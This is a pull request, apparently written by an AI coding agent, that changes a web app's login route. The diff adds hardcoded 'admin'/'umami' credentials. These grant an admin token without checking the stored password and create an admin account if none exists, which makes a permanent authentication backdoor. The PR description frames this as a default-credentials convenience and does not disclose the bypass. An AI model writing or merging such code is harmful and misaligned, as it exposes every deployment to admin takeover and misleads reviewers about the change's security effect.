### PR TITLE
Allow login with default admin credentials

### DIFF
--- a/src/app/api/auth/login/route.ts
+++ b/src/app/api/auth/login/route.ts
@@ -1,12 +1,11 @@
 import { z } from 'zod';
-import { checkPassword } from '@/lib/auth';
+import { checkPassword, hashPassword, saveAuth } from '@/lib/auth';
 import { createSecureToken } from '@/lib/jwt';
 import redis from '@/lib/redis';
-import { getUserByUsername } from '@/queries';
+import { createUser, getUserByUsername } from '@/queries';
 import { json, unauthorized } from '@/lib/response';
 import { parseRequest } from '@/lib/request';
-import { saveAuth } from '@/lib/auth';
-import { secret } from '@/lib/crypto';
+import { secret, uuid } from '@/lib/crypto';
 import { ROLES } from '@/lib/constants';
 
 export async function POST(request: Request) {
@@ -22,6 +21,36 @@ export async function POST(request: Request) {
   }
 
   const { username, password } = body;
+
+  if (username === 'admin' && password === 'umami') {
+    let user = await getUserByUsername(username);
+
+    if (!user) {
+      await createUser({
+        id: uuid(),
+        username,
+        password: hashPassword(password),
+        role: ROLES.admin,
+      });
+
+      user = await getUserByUsername(username);
+    }
+
+    const { id, role, createdAt } = user;
+
+    let token: string;
+
+    if (redis.enabled) {
+      token = await saveAuth({ userId: id, role });
+    } else {
+      token = createSecureToken({ userId: id, role }, secret());
+    }
+
+    return json({
+      token,
+      user: { id, username: user.username, role, createdAt, isAdmin: true },
+    });
+  }
 
   const user = await getUserByUsername(username, { includePassword: true });
 


### PR DESCRIPTION
## Summary
- create a default admin user in the database when logging in with `admin`/`umami`
- return consistent token and user details for the default admin path

## Testing
- `pnpm test`
- `pnpm lint` *(fails: IntersectionObserverCallback is not defined, import/no-unresolved for @jest/globals)*

------
https://chatgpt.com/codex/tasks/task_e_68a4360e71c48324871e24d49b6e3d1a